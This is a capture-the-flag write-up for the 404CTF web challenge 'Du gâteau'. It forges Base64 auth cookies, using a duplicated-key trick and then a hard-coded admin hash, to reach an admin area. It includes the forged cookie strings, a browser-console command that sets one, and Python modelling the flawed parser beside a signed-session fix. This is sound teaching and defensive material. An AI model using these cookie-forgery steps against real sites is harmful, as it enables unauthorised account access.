# Du gâteau

**Category:** Web - **Points:** 993 - **Difficulty:** Medium - **Solves:** 94

**Description:**\
We have discovered that **Hallebarde** uses a bakery as a cover for its criminal activities. Visit their website and see if you can get at their secrets.\
[https://du-gateau.404ctf.fr](https://du-gateau.404ctf.fr/)

**Solution:**

To solve this challenge, we need to find a way to bypass the cookie verification.\
When we open the site we see a "normal"-looking website:
![image](https://user-images.githubusercontent.com/91023285/174875445-3a0bf555-dbd5-4c9c-822e-3a535bb18524.png)

When we try to open the "*Espace d'administration*" (admin area) page, we get this error message:
![image](https://user-images.githubusercontent.com/91023285/174875750-967e2a26-d267-4734-8869-438c86f3505f.png)

To understand how the user cookie is generated, we fill in the login form on this page (username: *test* / password: *1234*):
![image](https://user-images.githubusercontent.com/91023285/174876307-c5db9f39-5a79-4c17-85a8-5904f3b3d94e.png)

We get this cookie: `auth=dXNlcm5hbWU9dGVzdDtwYXNzd29yZD1kNDA0NTU5ZjYwMmVhYjZmZDYwMmFjNzY4MGRhY2JmYWFkZDEzNjMwMzM1ZTk1MWYwOTdhZjM5MDBlOWRlMTc2YjZkYjI4NTEyZjJlMDAwYjlkMDRmYmE1MTMzZThiMWM2ZThkZjU5ZGIzYThhYjlkNjBiZTRiOTdjYzllODFkYg==;`, which is Base64-encoded.\
Decoding it gives: `username=test;password=d404559f602eab6fd602ac7680dacbfaadd13630335e951f097af3900e9de176b6db28512f2e000b9d04fba5133e8b1c6e8df59db3a8ab9d60be4b97cc9e81db`, i.e. the username we entered (*test*) followed by the SHA-512 hash of the password (hashed, not encrypted: the value is the plain, unsalted SHA-512 of the string `1234`). So the cookie is nothing more than the credentials themselves, Base64-encoded, and the server trusts whatever it decodes.

Now we need to make the site believe we are logged in as admin. The cookie is a list of `key=value` pairs separated by `;`, so we craft one with two pairs of each key: `username=Ayweth20;password=46a72ac861e946e09419cf10786d092e283c60fba5fa78ab7bd55d77d3d7a80ef3d98b7f155556f4e9f5b5593485295872fc6bdf695263f62133be16271ef69d;username=admin;password=`. The first `username`/`password` pair is a valid one (the account *Ayweth20* and its password hash); the server checks that pair, but the session it opens uses the second `username`, *admin* (the last value of a repeated key wins). We Base64-encode this cookie and send it to the website:
![image](https://user-images.githubusercontent.com/91023285/175650712-ca8a4bc2-eb40-479d-980c-ccfdec445c3e.png)\
![image](https://user-images.githubusercontent.com/91023285/175650797-8d901651-f9e0-4fb9-ba5d-6a8d4610eb70.png)
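As an added example (not the challenge's code, nor the writeup's), the following Python rebuilds the cookie format, checks that the hash in the cookie is the plain SHA-512 of `1234`, and models the server-side parsing mistake that lets the second `username` override the first. The two server-side login functions are a hypothetical reconstruction of the behaviour observed here (the real backend was never published); the user store, the HMAC secret and the session format are constructed for the example, and the forged cookie reuses the *test* account as the valid first pair where the writeup used *Ayweth20*. The last three functions go beyond the writeup and show the fix the flag hints at: a signed session cookie that carries no password hash at all.

```python
"""Rebuild the 'Du gâteau' auth cookie and model the duplicate-key confusion.

Added example, not code from the challenge or from the writeup. The server-side
functions are a hypothetical reconstruction of the observed behaviour (first
username/password pair verified, last username wins for the session).
"""
import base64
import hashlib
import hmac
import re

# Values taken from the writeup: the test account (password 1234), the cookie
# the site issued for it, and the admin hash found in the forgotten-password JS.
TEST_HASH = ("d404559f602eab6fd602ac7680dacbfaadd13630335e951f097af3900e9de176"
             "b6db28512f2e000b9d04fba5133e8b1c6e8df59db3a8ab9d60be4b97cc9e81db")
ADMIN_HASH = ("66651013935b4c2c31d9baba8fa5d37b809b10da453f293ec8f9a7fbb2ab2e2c"
              "1d69dc8d80969508028b5ec14e9d1de585929a4c0d534996744b495c325e3f3d")
PAGE_COOKIE = ("dXNlcm5hbWU9dGVzdDtwYXNzd29yZD1kNDA0NTU5ZjYwMmVhYjZmZDYwMmFjNzY4MGRh"
               "Y2JmYWFkZDEzNjMwMzM1ZTk1MWYwOTdhZjM5MDBlOWRlMTc2YjZkYjI4NTEyZjJlMDAw"
               "YjlkMDRmYmE1MTMzZThiMWM2ZThkZjU5ZGIzYThhYjlkNjBiZTRiOTdjYzllODFkYg==")

# Hypothetical user store standing in for the site's database.
USERS = {"test": TEST_HASH, "admin": ADMIN_HASH}


def sha512_hex(password: str) -> str:
    """Unsalted SHA-512 hex digest, which is what the cookie carried."""
    return hashlib.sha512(password.encode()).hexdigest()


def make_cookie(username: str, password_hash: str) -> str:
    """Base64(username=<u>;password=<h>), the format the login form produced."""
    plain = f"username={username};password={password_hash}"
    return base64.b64encode(plain.encode()).decode()


def forged_cookie() -> str:
    """The writeup's trick: a valid first pair, then a second username=admin
    pair with an empty password so the string still splits into key=value."""
    plain = f"username=test;password={TEST_HASH};username=admin;password="
    return base64.b64encode(plain.encode()).decode()


def vulnerable_login(cookie: str):
    """Hypothetical reconstruction: the FIRST username/password pair is checked,
    but the session user is read from a dict over all pairs (LAST key wins)."""
    plain = base64.b64decode(cookie).decode()
    first = re.search(r"username=([^;]*);password=([^;]*)", plain)
    if not first or USERS.get(first.group(1)) != first.group(2):
        return None
    fields = dict(p.split("=", 1) for p in plain.split(";") if "=" in p)
    return fields.get("username")


def strict_login(cookie: str):
    """Same format, but duplicate/unexpected keys are rejected and the pair
    that is verified is the pair that is used."""
    plain = base64.b64decode(cookie).decode()
    pairs = [p.split("=", 1) for p in plain.split(";")]
    if any(len(p) != 2 for p in pairs):
        return None
    if sorted(k for k, _ in pairs) != ["password", "username"]:
        return None
    fields = dict(pairs)
    if not hmac.compare_digest(USERS.get(fields["username"], ""), fields["password"]):
        return None
    return fields["username"]


# The real fix: no password hash in the cookie. The server issues a signed
# session and verifies the tag before trusting anything in it.
SERVER_SECRET = b"constructed-secret-for-this-example"  # assumption: server-side only


def issue_session(username: str) -> str:
    payload = f"username={username}".encode()
    tag = hmac.new(SERVER_SECRET, payload, hashlib.sha256).hexdigest()
    return base64.b64encode(payload + b";sig=" + tag.encode()).decode()


def verify_session(cookie: str):
    plain = base64.b64decode(cookie)
    payload, sep, tag = plain.rpartition(b";sig=")
    if not sep:
        return None
    expected = hmac.new(SERVER_SECRET, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):
        return None
    if not payload.startswith(b"username=") or b";" in payload:
        return None
    return payload[len(b"username="):].decode()


def rewrite_session(cookie: str, new_username: str) -> str:
    """Attacker keeps the tag and swaps the username; the tag no longer matches."""
    plain = base64.b64decode(cookie).decode()
    tag = plain.rpartition(";sig=")[2]
    return base64.b64encode(f"username={new_username};sig={tag}".encode()).decode()
```

`make_cookie("test", TEST_HASH)` reproduces the exact `auth` value the site issued, `vulnerable_login(forged_cookie())` returns `admin` while `strict_login` rejects the same cookie, and a session from `issue_session` survives `verify_session` only if its payload is untouched.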

We are now logged in as *admin* 🤩\
We can open the *Mot de passe oublié* (forgotten password) page and try to recover the account's password. After a few attempts it is clear that the password is not something we can guess.\
But when we click the submit button, no request shows up in the network traffic, so the check is done client-side, and the expected value (most likely the password hash) must be somewhere in the page's code.\
Indeed: the page's JavaScript contains this function, with the expected hash hard-coded:
![image](https://user-images.githubusercontent.com/91023285/175654840-74fe89a9-ece6-4a13-bee1-564f8ad9b722.png)

We now have the username *admin* and its password hash *66651013935b4c2c31d9baba8fa5d37b809b10da453f293ec8f9a7fbb2ab2e2c1d69dc8d80969508028b5ec14e9d1de585929a4c0d534996744b495c325e3f3d*, so we build a cookie in the same format and send it:
![image](https://user-images.githubusercontent.com/91023285/175655622-14baa883-151b-448c-a823-aa263a5c2825.png)

Damn! This does not work... 😢\
After the end of the CTF, I looked for another writeup to understand how to finish the challenge. I saw in this [writeup](https://blog.reinom.com/story/ctf/ctf4042022/web/gateau/) that I was missing just one `=` at the end of the cookie.\
The working cookie, set from the browser console, is: `document.cookie="auth=" + btoa("username=admin;password=66651013935b4c2c31d9baba8fa5d37b809b10da453f293ec8f9a7fbb2ab2e2c1d69dc8d80969508028b5ec14e9d1de585929a4c0d534996744b495c325e3f3d") + "=;";`. Note that the plain string is 152 characters long, so `btoa` already terminates its output with one `=` of padding; the value actually sent therefore ends in `==`.
![image](https://user-images.githubusercontent.com/91023285/175657932-c79d22a7-787b-49da-a4a5-a98bf0c93451.png)

<details>

<summary>🚩 FLAG</summary>

```
404CTF{m3f13Z_V0Us_D3s_MdP_D4nS_L3s_c00k13s!}
```

</details>
